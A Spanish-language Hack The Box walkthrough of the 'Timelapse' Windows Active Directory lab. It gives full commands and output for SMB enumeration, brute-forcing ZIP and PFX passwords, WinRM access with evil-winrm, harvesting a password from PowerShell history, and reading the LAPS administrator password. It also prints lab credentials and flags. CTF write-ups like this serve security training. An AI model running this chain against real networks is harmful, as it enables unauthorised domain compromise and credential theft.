Timelapse
8 minutos de lectura
Hack The Box. Windows. Máquina fácil. Esta máquina presenta un entorno de Active Directory (AD) donde se puede encontrar un archivo cifrado ZIP mediante SMB. Podemos obtener la contraseña y obtener un archivo PFX con claves públicas y privadas para WinRM. De nuevo, se puede obtener la contraseña y conseguir las claves para conectarse a la máquina. Existe un historial de comandos en PowerShell donde se encuentra una contraseña para un miembro del grupo LAPS, el cual puede mostrar la contraseña de Administrator. Para comprometer esta máquina se necesitan conocimientos de enumeración y explotación en Windows
- SO: Windows
- Dificultad: Fácil
- Dirección IP: 10.10.11.152
- Fecha: 26 / 03 / 2022
Escaneo de puertos
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.152 -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49692,53215
Nmap scan report for 10.10.11.152
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 00:13:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-28T00:15:13+00:00; +8h18m23s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
53215/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T00:14:36
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h18m22s, deviation: 0s, median: 8h18m22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 100.14 seconds
La máquina tiene abiertos los puertos 53 (DNS),88 (Kerberos), 135 (MS-RPC), 389 (LDAP), 445 (SMB) y 5986 (WinRM/SSL), entre otros.
$ crackmapexec smb 10.10.11.152
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
Además, vemos que la máquina es un controlador de dominio (DC) de un entorno de Active Directory (AD). Podemos empezar añadiendo timelapse.htb en /etc/hosts.
Enumeración por SMB
Podemos empezar mirando por SMB con una sesión nula:
$ smbclient -L 10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Vemos que hay un recurso compartido llamado shares. Podemos conectarnos a este y listar algunas carpetas:
$ smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 10:39:15 2021
.. D 0 Mon Oct 25 10:39:15 2021
Dev D 0 Mon Oct 25 14:40:06 2021
HelpDesk D 0 Mon Oct 25 10:48:42 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 14:40:06 2021
.. D 0 Mon Oct 25 14:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 10:46:42 2021
6367231 blocks of size 4096. 2285702 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.4 KiloBytes/sec) (average 8.4 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 10:48:42 2021
.. D 0 Mon Oct 25 10:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 09:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 09:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 09:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 09:57:44 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (545.5 KiloBytes/sec) (average 475.1 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (265.6 KiloBytes/sec) (average 445.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (654.5 KiloBytes/sec) (average 500.1 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (176.6 KiloBytes/sec) (average 468.0 KiloBytes/sec)
smb: \HelpDesk\> exit
Nos hemos descargado todos estos archivos:
winrm_backup.zipLAPS.x64.msiLAPS_Datasheet.docxLAPS_OperationsGuide.docxLAPS_TechnicalSpecification.docx
Rompiendo archivos
El archivo ZIP está protegido con contraseña:
$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 09:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
Podemos utilizar fcrackzip para encontrar la contraseña mediante un ataque de fuerza bruta:
$ fcrackzip -uDp $WORDLISTS/rockyou.txt winrm_backup.zip
PASSWORD FOUND!!!!: pw == supremelegacy
$ unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
El archivo ZIP contiene un archivo PFX, que contiene un par de claves para conectarnos por WinRM al puerto 5986, no 5985 como normalmente. Esto es porque se está utilizando SSL y por ello necesitamos claves pública y privada para conectarnos.
Podemos extraer estas claves mediante openssl:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
Can't read Password
Pero necesitamos otra contraseña porque supremelegacy no funciona.
Encontré una herramienta llamada crackpkcs12 para realizar un ataque de fuerza bruta:
$ ./crackpkcs12 -d $WORDLISTS/rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
Y obtenemos otra contraseña, vamos entonces a coger las claves:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
MAC verified OK
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub-key.pem
Enter Import Password:
MAC verified OK
Y ahora podemos usar evil-winrm para conectarnos a la máquina (no hay necesidad de poner usuario/contraseña porque ya vienen en las claves):
$ evil-winrm -i 10.10.11.152 --ssl -k priv-key.pem -c pub-key.pem
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
76a99a6d71f58a99a2844eb3b48334e3
Y ahí tenemos la flag user.txt.
Enumeración del sistema
Vamos a enumerar usuarios:
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 5:10:20 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 1:16:01 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user TRX
User name TRX
Full Name TRX
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2022 6:43:45 PM
Password expires Never
Password changeable 2/24/2022 6:43:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/27/2022 10:29:10 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.
Vemos que svc_deploy pertenece a LAPS_Readers y que TRX pertenece a Domain Admins.
LAPS son las siglas de Local Account Password Solution, que genera una contraseña segura para los administradores (los documentos de Word proporcionan dicha información). Si conseguimos acceder como svc_deploy seremos capaces de ver la contraseña de LAPS.
Después de un tiempo de enumeración, descubrimos que legacyy tiene un historial de PowerShell con comandos interesantes:
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Ahí tenemos la contraseña de svc_deploy. Ahora podemos ejecutar comandos cono svc_deploy mediante script blocks:
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -usessl -SessionOption $so -ScriptBlock { whoami }
timelapse\svc_deploy
E incluso nos podemos conectar por evil-winrm:
$ evil-winrm -i 10.10.11.152 --ssl -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Escalada de privilegios
Pero lo más importante es que podemos leer la contraseña configurada por LAPS mediante crackmapexec:
$ crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: h!0yj-1WI(YlDIz+2Il@w1/(
Y ahora tenemos acceso como Administrator:
$ evil-winrm -i 10.10.11.152 --ssl -u Administrator -p 'h!0yj-1WI(YlDIz+2Il@w1/('
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ..\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
¿Pero dónde está la flag root.txt? Pues habrá que buscarla:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem root.txt -Path C:\Users\ -Recurse
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/28/2022 6:16 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\TRX\Desktop\root.txt
1505bebfda29707adf43cf8530421b35